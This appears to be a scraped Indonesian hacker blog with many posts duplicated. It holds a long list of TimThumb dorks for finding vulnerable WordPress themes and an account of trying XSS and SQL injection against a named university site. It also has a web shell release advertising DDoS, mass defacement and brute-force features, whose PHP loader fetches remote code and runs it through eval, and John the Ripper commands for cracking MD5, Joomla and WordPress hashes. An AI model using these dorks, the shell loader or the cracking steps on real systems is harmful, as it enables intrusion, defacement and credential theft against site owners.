!tim /wp-content/themes/rend/scripts/timthumb.php "themes/rend"
!tim /wp-content/themes/echea/timthumb.php "themes/echea"
!tim /wp-content/themes/awake/lib/scripts/thumb.php "themes/awake"
!tim /wp-content/themes/academica/scripts/timthumb.php "Education WordPress Theme by"
!tim /wp-content/themes/academica/scripts/timthumb.php "/academica/scripts/"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "themes/parachute"
!tim /wp-content/themes/parachute/lib/scripts/timthumb.php "Parachute designed and produced by GhostPool"
!tim /wp-content/themes/soulbop/scripts/timthumb.php "soulbop/scripts"
!tim /wp-content/themes/airfolio/scripts/timthumb.php "themes/airfolio"
!tim /wp-content/themes/Romix/scripts/thumb.php "Romix/scripts"
!tim /wp-content/themes/granda/scripts/timthumb.php "/granda/scripts/"
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "/themes/aquitaine/"
!tim /wp-content/themes/ibuze/scripts/timthumb.php "/ibuze/scripts/"
!tim /wp-content/themes/reviewit/lib/scripts/timthumb.php "/themes/reviewit/"
!tim /wp-content/themes/bizpress/scripts/timthumb.php "/bizpress/scripts/"
!tim /wp-content/themes/headlines/thumb.php "themes/headlines"
!tim /wp-content/themes/genoa/timthumb.php "WordPress and WPCrunchy"
!tim /wp-content/themes/multidesign/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/smoke/scripts/timthumb.php "2010 iamthemes.com"
!tim /wp-content/themes/genoa/timthumb.php "Genoa Theme"
!tim /wp-content/plugins/kino-gallery/timthumb.php "Developed by Kino Creative"
!tim /wp-content/themes/tarnished/lib/scripts/timthumb.php "Copyright © Tarnished"
!tim /wp-content/themes/exhibit/lib/scripts/timthumb.php "Exhibit designed and produced by GhostPool."
!tim /wp-content/themes/averin/timthumb.php "averin" Logo
!tim /wp-content/themes/redcarpet/thumbopen.php "themes/redcarpet/"
!tim /wp-content/themes/comfy/thumbopen.php "/themes/comfy/"
!tim /wp-content/themes/comfy-3/thumbopen.php "themes/comfy-3/"
!tim /wp-content/themes/comfy-3.0.9/thumbopen.php "/comfy-3.0.9/"
!tim /wp-content/themes/headlines_enhanced/thumb.php "PLR Blogs · Sitemap · Privacy Policy"
!tim /wp-content/themes/widescreen/includes/timthumb.php "— Hide menu"
!tim /wp-content/themes/push/framework/lib/timthumb.php "/themes/push/framework/lib/"
!tim /wp-content/themes/headlines/thumb.php "Designed by Top Wp Plugins"
!tim /wp-content/themes/thejournal/thumb.php "/themes/thejournal/"
!tim /wp-content/themes/couponpress/thumbs/_tbs.php "/themes/couponpress/"
!tim /wp-content/themes/rockwell_v1.3/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.0/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell_v1.7.1/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/rockwell/scripts/timthumb.php "Rockwell - Business and Portfolio Wordpress"
!tim /wp-content/themes/catalyst/timthumb.php "themes/catalyst"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "Clockstone" "All Rights Reserved"
!tim /wp-content/themes/clockstone/theme/classes/timthumb.php "/themes/clockstone/"
!tim /wp-content/themes/sakura/plugins/woo-tumblog/functions/thumb.php "Black Sakura WP"
!tim /wp-content/themes/broadcast/thumb.php "Broadcast. All Rights Reserved"
!tim /wp-content/themes/amplus/functions/timthumb.php "/amplus/functions/"
!tim /wp-content/themes/cubed/functions/timthumb.php "/themes/cubed/functions/"
!tim /wp-content/themes/curvo/functions/timthumb.php "/curvo/functions/"
!tim /wp-content/themes/peano/functions/img_resize/timthumb.php "/themes/peano/functions"
!tim /wp-content/themes/especial/libraries/timthumb.php "Especial Wordpress Theme"
!tim /wp-content/themes/city/scripts/timthumb.php "City Themes" "All rights reserved."
!tim /wp-content/themes/aquitaine/lib/custom/timthumb.php "Aquitaine Ltd. All rights reserved"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "/themes/dropholio/"
!tim /wp-content/themes/dropholio/functions/img_resize/timthumb.php "2011 Dropholio"
!tim /wp-content/themes/stufe/scripts/timthumb.php "/stufe/scripts/"
!tim /wp-content/themes/thestation/thumb.php "/themes/thestation/"
!tim /wp-content/themes/mainstream/thumb.php "/themes/mainstream/"
!tim /wp-content/themes/rockstar/thumb.php "/themes/rockstar/"
!tim /wp-content/themes/bueno/thumb.php "/themes/bueno/"
!tim /wp-content/themes/backstage/thumb.php "/themes/backstage/"
!tim /wp-content/themes/deliciousmagazine/thumb.php "/themes/deliciousmagazine/"
!tim /wp-content/themes/mosaico/js/timthumb.php "/themes/mosaico/"
!tim /wp-content/themes/machtastic/_assets/timthumb.php "themes/machtastic"
!tim /wp-content/themes/cold/lib/timthumb.php "/themes/cold/lib/"
!tim /wp-content/themes/spicy/lib/timthumb.php "/themes/spicy/lib/"
!tim /wp-content/themes/lunar/lib/timthumb.php "/themes/lunar/lib/"
!tim /wp-content/themes/kolos/thumb.php "/themes/kolos/"
!tim /wp-content/themes/photobox/themify/img.php "/themes/photobox/"
!tim /wp-content/themes/bloggie/themify/img.php "/themes/bloggie/"
!tim /wp-content/themes/blogfolio/themify/img.php "/themes/blogfolio/"
!tim /wp-content/themes/bizco/themify/img.php "/themes/bizco/"
!tim /wp-content/themes/thememin/themify/img.php "/themes/ThemeMin"
!tim /wp-content/themes/sleex/scripts/thumb.php "/themes/sleex/"
!tim /wp-content/themes/matchpoint/functions/thumb.php "/themes/matchpoint/"
!tim /wp-content/themes/nitro/library/functions/timthumb.php "/themes/nitro/library/"
!tim /wp-content/themes/visual/library/functions/timthumb.php "/themes/visual/library/functions/"
!tim /wp-content/themes/myjourney_3.1/thumb.php "wp-content/themes/myjourney"
!tim /wp-content/themes/adinda/timthumb.php "themes/adinda"
!tim /wp-content/themes/myjourney/thumb.php "themes/myjourney/"
!tim /wp-content/themes/modus/thumb.php "/themes/modus/"
!tim /wp-content/themes/spitz/lib/scripts/timthumb.php "/themes/spitz/"
!tim /wp-content/themes/handcrafted/functions/scripts/timthumb.php "/themes/handcrafted/functions/"
!tim /wp-content/themes/vulcan/timthumb.php "/wp-content/themes/vulcan/timthumb.php"
!tim /wp-content/themes/equator/timthumb.php "/wp-content/themes/equator/timthumb.php"
!tim /wp-content/themes/FactoryWP/javascript/timthumb.php "/wp-content/themes/factory"
!tim /wp-content/themes/multimedia/thumb.php "/wp-content/themes/multimedia" ?src
!tim /wp-content/themes/glance/inc/timthumb.php "/wp-content/themes/glance"
!tim /wp-content/themes/picnic/inc/timthumb.php "/wp-content/themes/picnic"
!tim /wp-content/themes/setinstone/inc/timthumb.php "/themes/setinstone/inc/"
!tim /wp-content/themes/setinstone/inc/timthumb.php "Copyright 2011 Turkhitbox"
!tim /wp-content/themes/nvision/utils/timthumb.php "themes/nvision/utils/"
!tim /wp-content/themes/mercedesa/includes/thumb.php "/themes/mercedesa/includes/"
!tim /wp-content/themes/village/timthumb.php "/wp-content/themes/village" ?src=
!tim /wp-content/themes/explode/includes/timthumb.php "/wp-content/themes/explode/"
!tim /wp-content/themes/delight/scripts/timthumb.php "/themes/delight/scripts/"
!tim /wp-content/themes/delight/scripts/timthumb.php "©2011 Pixedelic by Consorzio Creativo"
!tim /wp-content/themes/precious/inc/timthumb.php "/themes/precious/inc/"
!tim /wp-content/themes/eruption/framework/lib/timthumb.php "/themes/eruption/"
!tim /wp-content/themes/cleanple/theme/classes/timthumb.php "/cleanple/theme/classes/"
!tim /wp-content/themes/blakesley/theme/classes/timthumb.php "/blakesley/theme/classes"
!tim /wp-content/themes/tribune/scripts/timthumb.php "tribune/scripts"
!tim /wp-content/themes/rezo/themify/img.php "wp-content/themes/Rezo" ?src=
!tim /wp-content/themes/edmin/themify/img.php "wp-content/themes/Edmin" ?src=
!tim /wp-content/themes/wigi/themify/img.php "wp-content/themes/wigi" ?src=
!tim /wp-content/themes/sidepane/themify/img.php "wp-content/themes/Sidepane" ?src=
!tim /wp-content/themes/Colt/thumb.php "wp-content/themes/Colt" ?src=
!tim /wp-content/themes/OnTheGo/timthumb.php "wp-content/themes/On the Go" ?src=
!tim /wp-content/themes/InnovationScience2/thumb.php "wp-content/themes/Innovation+Science" ?src=
!tim /wp-content/themes/Avenue/timthumb.php "wp-content/themes/Avenue" ?src=
!tim /wp-content/themes/blacklabel/framework/timthumb.php "/themes/blacklabel/"
Sumber : http://www.cyberbintauna.org/2014/07/bug-dork-timthumb-terbaru-update-2014.html
Saturday, June 14, 2014
Melakukan Penyerangan dengan menggunakan add-ons XSS dan SQL Injection versi cyberbaghost
Berdasarkan hasil yang di dapat, cyberbaghost mencoba melakukan hacking
terhadap sadulur.ma*****ha.edu karena pada hasil scan yang di dapat dari
acunetix menujukan bahwa website ini memiliki level high vulnerable
terhadap hacking dengan XSS. cyberbaghost mencoba melakukan XSS dengan
menggunakan beberapa tools. Pertama menggunakan add-on pada browser
firefox.
Langkah – langkah untuk menggunakan XSS, yaitu:
Dari gambar diatas ini menunjukan semua XSS yang dicoba tidak berhasil. Setelah itu cyberbaghost mencoba untuk melakukan sql injection dengan menggunakan tools sqlinjection me yang merupakan adds-on pada firefox juga. Berikut beberapa tampilan cara menggunakan sqlinjection me terhadap beberapa subdomain ma*****ha.edu, salah satunya news.ma*****ha.edu
Akan tetapi, cara yang cyberbaghost gunakan masih tidak bisa menyerang website tersebut
beberapa info yang ingin cyberbaghost sampaikan
Exploit-Me
Exploit-Me merupakan add-on browser Mozilla Firefox yang beralamatkan di http://labs.securitycompass.com/index.php/exploit-me/, terdiri atas tiga Add-on, yaitu:
XSS-Me dan SQL Inject-Me
Karena terintegrasi dengan browser Firefox sebagai add-on, penggunaan XSS-Me sangat mudah dilakukan. Karena XSS sering memanfaatkan form input, arahkan browser pada form input yang terdapat pada aplikasi web Anda. Klik kanan salah satu input text dan pilih menu Open XSS Me Sidebar, maka akan tampil sidebar atau panel baru (XSS Me) di sebelah kiri. Cara lain menampilkan panel ini adalah memilih menu Tools - XSS ME - Open XSS Me Sidebar pada browser Firefox.
SQL Inject Me bekerja dengan cara yang sama dengan XSS-Me. Aktifkan panel SQL Inject-Me dengan klik kanan input form dan pilih menu Open SQL Inject Me Sidebar atau jika dari Firefox, pilih menu Tools - SQL Inject Me - Open SQL Inject Me Sidebar.
Access-Me
Sedikit berbeda dengan dua Add-on sebelumnya, Access-Me tampil pada toolbar Firefox walaupun bisa diakses juga melalui menu Tools - Access Me melalui browser Firefox. Cara kerja Access-Me adalah mengirimkan beberpa request pada halaman yang dites dengan tujuan menemukan beberapa celah keamanan yang memungkinkan hacker memperoleh hak akses pada resource website.
sekian semoga bermanfaat
salam dari saya cyberbaghost
Langkah – langkah untuk menggunakan XSS, yaitu:
- Install add-on pada Mozilla xss-me pada situs resmi Mozilla
- Buka halaman yang ingin diuji oleh xss-me
- Lalu klik kanan pada halama yang ingin diuji dan pilih open xss-me side bar
- Pilih pengujian yang tersedia dan jalankan.
Dari gambar diatas ini menunjukan semua XSS yang dicoba tidak berhasil. Setelah itu cyberbaghost mencoba untuk melakukan sql injection dengan menggunakan tools sqlinjection me yang merupakan adds-on pada firefox juga. Berikut beberapa tampilan cara menggunakan sqlinjection me terhadap beberapa subdomain ma*****ha.edu, salah satunya news.ma*****ha.edu
Akan tetapi, cara yang cyberbaghost gunakan masih tidak bisa menyerang website tersebut
beberapa info yang ingin cyberbaghost sampaikan
Exploit-Me
Exploit-Me merupakan add-on browser Mozilla Firefox yang beralamatkan di http://labs.securitycompass.com/index.php/exploit-me/, terdiri atas tiga Add-on, yaitu:
- XSS-Me (https://addons.mozilla.org/en-US/firefox/addon/xss-me/)
- SQL Inject-Me (https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/).
- Access-Me (https://addons.mozilla.org/en-US/firefox/addon/access-me/).
XSS-Me dan SQL Inject-Me
Karena terintegrasi dengan browser Firefox sebagai add-on, penggunaan XSS-Me sangat mudah dilakukan. Karena XSS sering memanfaatkan form input, arahkan browser pada form input yang terdapat pada aplikasi web Anda. Klik kanan salah satu input text dan pilih menu Open XSS Me Sidebar, maka akan tampil sidebar atau panel baru (XSS Me) di sebelah kiri. Cara lain menampilkan panel ini adalah memilih menu Tools - XSS ME - Open XSS Me Sidebar pada browser Firefox.
SQL Inject Me bekerja dengan cara yang sama dengan XSS-Me. Aktifkan panel SQL Inject-Me dengan klik kanan input form dan pilih menu Open SQL Inject Me Sidebar atau jika dari Firefox, pilih menu Tools - SQL Inject Me - Open SQL Inject Me Sidebar.
Access-Me
Sedikit berbeda dengan dua Add-on sebelumnya, Access-Me tampil pada toolbar Firefox walaupun bisa diakses juga melalui menu Tools - Access Me melalui browser Firefox. Cara kerja Access-Me adalah mengirimkan beberpa request pada halaman yang dites dengan tujuan menemukan beberapa celah keamanan yang memungkinkan hacker memperoleh hak akses pada resource website.
sekian semoga bermanfaat
salam dari saya cyberbaghost
Friday, May 30, 2014
cyberbaghost V1.2 1kb
Setelah merilis cyberbaghost shell yang versi awal sekarang cyberbaghost merilis kembali shell versi terbarunya :D
ada penambahan fitur Paypal Checker Manu WHM Exploiter versi cyberbagost
serta desain yang lebih menarik dibandingkan versi awalnya yaitu pemberian efek animasi pada kursor dan backgroundnya yang istimewah yang membedakan dengan shell lainnya adalah ada soundtrack musiknya dijamin anda tidak akan menemukan dishell lain cyberbaghost yang pertama menemukan ide tersebut :)
perincian fitur:
Shell
Eval
Mysql
Database Dump
Php Info
Net Sploit
Upload
E-Mail
Port Scan
Ddos
Tools
Symlink
Config
Bypass
Domain
Joomla Server Scanner
Joomla IndChange
Wordpress ResPass Joomla ResPass WHMCS Decoder WHM EXPLOIT Zone-H Mass Deface Wordpress BruteForce Cpanel BruteForce Bypass CloudFlare
Paypal Checker Private Dork Scaner SQLI SQLI EXPLOIT Admin Finder Password Hash Hash ID Script Encode Website Whois About Log-Out
Wordpress ResPass Joomla ResPass WHMCS Decoder WHM EXPLOIT Zone-H Mass Deface Wordpress BruteForce Cpanel BruteForce Bypass CloudFlare
Paypal Checker Private Dork Scaner SQLI SQLI EXPLOIT Admin Finder Password Hash Hash ID Script Encode Website Whois About Log-Out
ukuran 1kb
<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$text = file_get_contents('http://gfisecwebtool.besaba.com/cyberbaghostshell1.2.txt');
@eval(str_rot13(gzinflate(str_rot13(base64_decode(($text))))));
?>
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$text = file_get_contents('http://gfisecwebtool.besaba.com/cyberbaghostshell1.2.txt');
@eval(str_rot13(gzinflate(str_rot13(base64_decode(($text))))));
?>
Tuesday, May 13, 2014
cara mengganti nama akun fb terbaru 2014
Selamat malam semua.. maaf ane baru bisa update blog ini karena jaringan yang kurang mendukung akhir-akhir ini.
Di sini ane akan menjelaskan cara ganti nama akun facebook yang udah limit dan cara ini work 100%.
Pasti diantara kalian ada yang pengen ganti nama akun dengan nama yang lain tapi tidak bisa karena sudah limit. Dan pastinya bingung nyari solusi dimana-mana (kebanyakan gak work).
Tapi tenang aja, kalian sudah masuk di blog yang tepat untuk mengetahui cara mengganti nama akun yang paling mujarab dan pastinya bikin kita senang karena nama akun kita bisa di ganti berapa kalipun kita mau ^_^.
Nah, ane akan mulai menjelaskan caranya, silahkan di simak baik-baik ok ...
Di sini ane akan menjelaskan cara ganti nama akun facebook yang udah limit dan cara ini work 100%.
Pasti diantara kalian ada yang pengen ganti nama akun dengan nama yang lain tapi tidak bisa karena sudah limit. Dan pastinya bingung nyari solusi dimana-mana (kebanyakan gak work).
Tapi tenang aja, kalian sudah masuk di blog yang tepat untuk mengetahui cara mengganti nama akun yang paling mujarab dan pastinya bikin kita senang karena nama akun kita bisa di ganti berapa kalipun kita mau ^_^.
Nah, ane akan mulai menjelaskan caranya, silahkan di simak baik-baik ok ...
- masuk ke pengaturan akun
- Langsung ke pengaturan Umum
- Ganti Bahasa yang di pakai sekarang ke bahasa yang lain (contoh English)
- Sekarang ganti nama/Nick ente
- Kalau sudah, Ganti lagi bahasanya ke bahasa yang semula.
- Selesai, silahkan di lihat nama Fb kalian... berhasil kan. Saatnya bilang "SEMPURNAAAA"....
Nah, itu cara ganti akaun yang paling mujarab di tahun 2014 ini dan pastinya work 100%. Maaf, gak ada ScreenShot -_-.
Walaupun singkat tapi padat Bung ^_^.
Silahkan di coba.. Jangan lupa komentarnya Mas bro :D
Sekian dulu Postingan ane kali ini, semoga bermanfaat untuk kalian semua.
Wassalam.....
Thursday, May 8, 2014
Password Cracking dengan John The Ripper (JTR)
Ok pada kesempatan ini saya cyberbaghost akan sedikit mengupas tentang si Paman John The Ripper (JTR) sang penyelamat dunia. xixixixi :p
JTR merupakan sebuah aplikasi untuk melakukan password cracking. Aplikasi ini dapat berjalan pada platform *NIX, dan WIN. Bagi yang belum mempunyai Aplikasi ini dapat didowload http://www.openwall.com/john/
Aplikasi ini sangat populer, siapa sih yang gak kenal sama paman si JOHN :D. Aplikasi ini sangat membantu bagi seseorang yang biasanya melakukan teknik SQL Injection, Dll karena biasanya password yang ditemukan itu di enkrypt oleh si Admin. apalagi ketika http://www.md5decrypter.co.uk tidak dapat memecahkannya. si JTR lah yang akan berperan disini :
Ok, Langsung saja ke Tekniknya :
1. MD5 Hash
– Contoh MD5 Hash
21232f297a57a5a743894a0e4a801fc3
827ccb0eea8a706c4c34a16891f84e7b
Untuk melakukan Crack
Save MD5 Hash kedalam sebuah file dengan seperti ini
alpha : karakter huruf
digit : karakter angka
alnum : huruf dan angka
all : mencoba semua karakter
Klw ini sedikit berbeda, karena password joomla memiliki algorima seperti
md5([passwordasli]+[salt]) hasilnya akan seperti ini f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Contoh Joomla Hash
f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Cara Crack :
Save Hashnya seperti ini dalam sebuah file
contoh Hashnya
$P$937lj8T3rci18KkTykssJJWHrtsVtb/
cara crack :
Save hash diatas dalam sebuah file seperti ini
JTR merupakan sebuah aplikasi untuk melakukan password cracking. Aplikasi ini dapat berjalan pada platform *NIX, dan WIN. Bagi yang belum mempunyai Aplikasi ini dapat didowload http://www.openwall.com/john/
Aplikasi ini sangat populer, siapa sih yang gak kenal sama paman si JOHN :D. Aplikasi ini sangat membantu bagi seseorang yang biasanya melakukan teknik SQL Injection, Dll karena biasanya password yang ditemukan itu di enkrypt oleh si Admin. apalagi ketika http://www.md5decrypter.co.uk tidak dapat memecahkannya. si JTR lah yang akan berperan disini :
Ok, Langsung saja ke Tekniknya :
1. MD5 Hash
– Contoh MD5 Hash
21232f297a57a5a743894a0e4a801fc3
827ccb0eea8a706c4c34a16891f84e7b
Untuk melakukan Crack
Save MD5 Hash kedalam sebuah file dengan seperti ini
1:21232f297a57a5a743894a0e4a801fc3
2:827ccb0eea8a706c4c34a16891f84e7b
root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md5 pass.txtMenggunakan Wordlist
12345 (2)
admin (1)
guesses: 2 time: 0:00:00:00 100.00% (2)
root@th3_w1tch:/pentest/passwords/jtr# ./john –wordlist=/data/dict.txt -format=raw-md5 pass.txtMenggunakan Type Password :
alpha : karakter huruf
digit : karakter angka
alnum : huruf dan angka
all : mencoba semua karakter
root@th3_w1tch:/pentest/passwords/jtr#./john –incremental=alnum –format=raw-md5 pass.txt2. MD4 Hash
root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-md4 pass.txt3. SHA1 Hash
root@th3_w1tch:/pentest/passwords/jtr# ./john -format=raw-sha1 pass.txt4. MD5 Jomla Hash
Klw ini sedikit berbeda, karena password joomla memiliki algorima seperti
md5([passwordasli]+[salt]) hasilnya akan seperti ini f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Contoh Joomla Hash
f9c63438a5fececf0d99355394024f3c:YpSmHvK6ut2306WsORjw3bKAmHKH4eT6
Cara Crack :
Save Hashnya seperti ini dalam sebuah file
1:md5_gen(1)f9c63438a5fececf0d99355394024f3c$YpSmHvK6ut2306WsORjw3bKAmHKH4eT6perhatikan pada saat melakukan save “ : ” diganti menjadi “$“, md5$salt
root@th3_w1tch:/pentest/passwords/jtr#./john –subformat=md5_gen\(1\) pass.txt5. WordPress Phpass Hash
Loaded 1 password hash ( md5_gen(1): md5($p.$s) (joomla) [md5-gen SSE2 16x4])
ddddda (1)
guesses: 1 time: 0:00:00:02 (3)
contoh Hashnya
$P$937lj8T3rci18KkTykssJJWHrtsVtb/
cara crack :
Save hash diatas dalam sebuah file seperti ini
1:$P$937lj8T3rci18KkTykssJJWHrtsVtb/
root@th3_w1tch:/pentest/passwords/jtr#./john –subformat=md5_gen\(17\) pass.txtOk Sekian dulu, Klw Kurang Jelas Silahkan Komennya :D, Semoga bermanfaat
Wednesday, May 7, 2014
Kerinci tools 0.9 tool pentester
kini saya memberikan tools pentester
yang difungsikan khusus untuk memberi tahukan sebuah celah web dan juga
memberikan akses inject sesuai wordlist yang tergabung di dalam software
ini, sebut saja software ini dikenal dengan sapaan kerinci,
kerinci sendiri merupakan tools yang sejak dahulu kala para maniak pentester menggunakannya untuk mengetahui celah web mereka sendiri, tetapi apa di kata ketika tool kecil ini disebar luaskan di seluruh dunia, maka hasilnya bisa positif dan juga negatif, ya postifnya bisa memberikan wawasan lebih banyak mengenai web dan celahnya, lalu tidak untuk diretas, hanya untuk belajar memperbaikinya, dan negatifnya, ketika seseorang berhasil memecahkan celahnya, maka dia bisa meretas situs target yang dia inginkan bisa di kendalikan sesuka hatinya, jadi pamer sebuah script dan beraneka macam model bahasa html program web yang mereka buat, lalu di dunia maya diberi nama, Deface show off yang artinya memamerkan hasil atau karya web yang diretas oleh orang - orang yang sedikit bertanggung jawab atas hal ini. Baiklah, semoga para pembaca tidak menyalah gunakan software ini. Ini hanya untuk pembelajaran semata, bukan untuk disalah gunakan. cyberbaghost tidak bertanggung jawab atas penyalah gunaan tools ini. Selebihnya tanggung jawab ada di tangan pengguna. Beberapa gambar atau sebuah perubahan yang saya perbuat dengan software ini. Anda bisa mellihatnya dibawah ini :
Instalasi mode :
Nah cukup itu saja pertunjukkan dari saya, semoga software ini sangat bermanfaat untuk anda semua, Kerinci tools 0.9 Easly Installation. jika anda berminat, maka link unduh dapat anda temukan dibawah ini:
Disinikini saya memberikan tools pentester yang difungsikan khusus untuk memberi tahukan sebuah celah web dan juga memberikan akses inject sesuai wordlist yang tergabung di dalam software ini, sebut saja software ini dikenal dengan sapaan kerinci,
kerinci sendiri merupakan tools yang sejak dahulu kala para maniak pentester menggunakannya untuk mengetahui celah web mereka sendiri, tetapi apa di kata ketika tool kecil ini disebar luaskan di seluruh dunia, maka hasilnya bisa positif dan juga negatif, ya postifnya bisa memberikan wawasan lebih banyak mengenai web dan celahnya, lalu tidak untuk diretas, hanya untuk belajar memperbaikinya, dan negatifnya, ketika seseorang berhasil memecahkan celahnya, maka dia bisa meretas situs target yang dia inginkan bisa di kendalikan sesuka hatinya, jadi pamer sebuah script dan beraneka macam model bahasa html program web yang mereka buat, lalu di dunia maya diberi nama, Deface show off yang artinya memamerkan hasil atau karya web yang diretas oleh orang - orang yang sedikit bertanggung jawab atas hal ini. Baiklah, semoga para pembaca tidak menyalah gunakan software ini. Ini hanya untuk pembelajaran semata, bukan untuk disalah gunakan. cyberbaghost tidak bertanggung jawab atas penyalah gunaan tools ini. Selebihnya tanggung jawab ada di tangan pengguna. Beberapa gambar atau sebuah perubahan yang saya perbuat dengan software ini. Anda bisa mellihatnya dibawah ini :
Instalasi mode :
Nah cukup itu saja pertunjukkan dari saya, semoga software ini sangat bermanfaat untuk anda semua, Kerinci tools 0.9 Easly Installation. jika anda berminat, maka link unduh dapat anda temukan dibawah ini:
Disini
*cyberbaghost aka bagus w crew
kerinci sendiri merupakan tools yang sejak dahulu kala para maniak pentester menggunakannya untuk mengetahui celah web mereka sendiri, tetapi apa di kata ketika tool kecil ini disebar luaskan di seluruh dunia, maka hasilnya bisa positif dan juga negatif, ya postifnya bisa memberikan wawasan lebih banyak mengenai web dan celahnya, lalu tidak untuk diretas, hanya untuk belajar memperbaikinya, dan negatifnya, ketika seseorang berhasil memecahkan celahnya, maka dia bisa meretas situs target yang dia inginkan bisa di kendalikan sesuka hatinya, jadi pamer sebuah script dan beraneka macam model bahasa html program web yang mereka buat, lalu di dunia maya diberi nama, Deface show off yang artinya memamerkan hasil atau karya web yang diretas oleh orang - orang yang sedikit bertanggung jawab atas hal ini. Baiklah, semoga para pembaca tidak menyalah gunakan software ini. Ini hanya untuk pembelajaran semata, bukan untuk disalah gunakan. cyberbaghost tidak bertanggung jawab atas penyalah gunaan tools ini. Selebihnya tanggung jawab ada di tangan pengguna. Beberapa gambar atau sebuah perubahan yang saya perbuat dengan software ini. Anda bisa mellihatnya dibawah ini :
Instalasi mode :
Diperkaya dengan mode installer, agar pengguna lebih mudah dalam melakukan instalasi software kerinci tools 0.9 ini. |
Nah cukup itu saja pertunjukkan dari saya, semoga software ini sangat bermanfaat untuk anda semua, Kerinci tools 0.9 Easly Installation. jika anda berminat, maka link unduh dapat anda temukan dibawah ini:
Disinikini saya memberikan tools pentester yang difungsikan khusus untuk memberi tahukan sebuah celah web dan juga memberikan akses inject sesuai wordlist yang tergabung di dalam software ini, sebut saja software ini dikenal dengan sapaan kerinci,
kerinci sendiri merupakan tools yang sejak dahulu kala para maniak pentester menggunakannya untuk mengetahui celah web mereka sendiri, tetapi apa di kata ketika tool kecil ini disebar luaskan di seluruh dunia, maka hasilnya bisa positif dan juga negatif, ya postifnya bisa memberikan wawasan lebih banyak mengenai web dan celahnya, lalu tidak untuk diretas, hanya untuk belajar memperbaikinya, dan negatifnya, ketika seseorang berhasil memecahkan celahnya, maka dia bisa meretas situs target yang dia inginkan bisa di kendalikan sesuka hatinya, jadi pamer sebuah script dan beraneka macam model bahasa html program web yang mereka buat, lalu di dunia maya diberi nama, Deface show off yang artinya memamerkan hasil atau karya web yang diretas oleh orang - orang yang sedikit bertanggung jawab atas hal ini. Baiklah, semoga para pembaca tidak menyalah gunakan software ini. Ini hanya untuk pembelajaran semata, bukan untuk disalah gunakan. cyberbaghost tidak bertanggung jawab atas penyalah gunaan tools ini. Selebihnya tanggung jawab ada di tangan pengguna. Beberapa gambar atau sebuah perubahan yang saya perbuat dengan software ini. Anda bisa mellihatnya dibawah ini :
Instalasi mode :
Diperkaya dengan mode installer, agar pengguna lebih mudah dalam melakukan instalasi software kerinci tools 0.9 ini. |
Nah cukup itu saja pertunjukkan dari saya, semoga software ini sangat bermanfaat untuk anda semua, Kerinci tools 0.9 Easly Installation. jika anda berminat, maka link unduh dapat anda temukan dibawah ini:
Disini
*cyberbaghost aka bagus w crew
Tuesday, May 6, 2014
Mengatasi Masalah Lupa Password User di Windows 7
Jika Anda melupakan password user pada komputer, maka akan menjadi masalah yang serius bagi anda jika pada komputernya terdapat data-data penting. Mungkin setiap Sistem Operasi memiliki cara-cara yang berbeda untuk memulihkanya.
Khusus bagi pengguna Windows 7, saya akan memberi salah satu cara mengatasi lupa password user ini. Anda beruntung jika sebelum melupakan password user telah membuat Password Reset Disk. Karena Password Reset Disk ini dapat memulihkan Sistem Operasi Windows 7 dan mungkin Windows versi lainya yang Password User-nya telah dilupakan oleh pemiliknya sendiri.
Cara yang akan saya bagikan kali ini mengharuskan anda untuk Membuat Password Reset Disk Sebelum Lupa Password di Windows 7. Karena jika anda belum membuat Password Reset Disk tersebut, maka jangan harap Windows 7 yang anda lupakan password user-nya dapat dipulihkan dengan cara ini. Mungkin anda harus mencari cara lain untuk memulihkanya. Atau jalan terakhir ya instal ulang dengan resiko data-data penting yang terdapat pada partisi C atau partisi tempat menyimpan sistem operasi, akan terformat atau terhapus seluruhnya.
Seperti yang telah dijelaskan sebelumnya bahwa password reset disk ini bekerja dengan mereset atau membuat ulang password baru. Maka jika anda melupakan password user, anda dapat meminta untuk membuat ulang password baru dengan password reset disk yang menyimpan password lama, sebagai bukti bahwa anda adalah pemilik PC atau salah satu user pada SO Windows 7. Oh iya, password reset disk ini hanya dapat digunakan pada satu user, dengan kata lain tidak akan bisa memulihkan user lain apalagi SO Windows pada perangkat lain.
OK, kita mulai saja pada pokok pembahasan yaitu Cara Memulihkan Windows 7 yang telah dilupakan password user-nya.
1. Masukan Flashdisk yang di dalamnya terdapat file password reset disk yaitu userkey.psw ke USB port.
2. Pada halaman tempat kita login, inputkan saja tulisan apa pun dan biarkan terjadi kesalahan. Maka, akan tampil peringatan seperti berikut, klik saja OK.
Khusus bagi pengguna Windows 7, saya akan memberi salah satu cara mengatasi lupa password user ini. Anda beruntung jika sebelum melupakan password user telah membuat Password Reset Disk. Karena Password Reset Disk ini dapat memulihkan Sistem Operasi Windows 7 dan mungkin Windows versi lainya yang Password User-nya telah dilupakan oleh pemiliknya sendiri.
Cara yang akan saya bagikan kali ini mengharuskan anda untuk Membuat Password Reset Disk Sebelum Lupa Password di Windows 7. Karena jika anda belum membuat Password Reset Disk tersebut, maka jangan harap Windows 7 yang anda lupakan password user-nya dapat dipulihkan dengan cara ini. Mungkin anda harus mencari cara lain untuk memulihkanya. Atau jalan terakhir ya instal ulang dengan resiko data-data penting yang terdapat pada partisi C atau partisi tempat menyimpan sistem operasi, akan terformat atau terhapus seluruhnya.
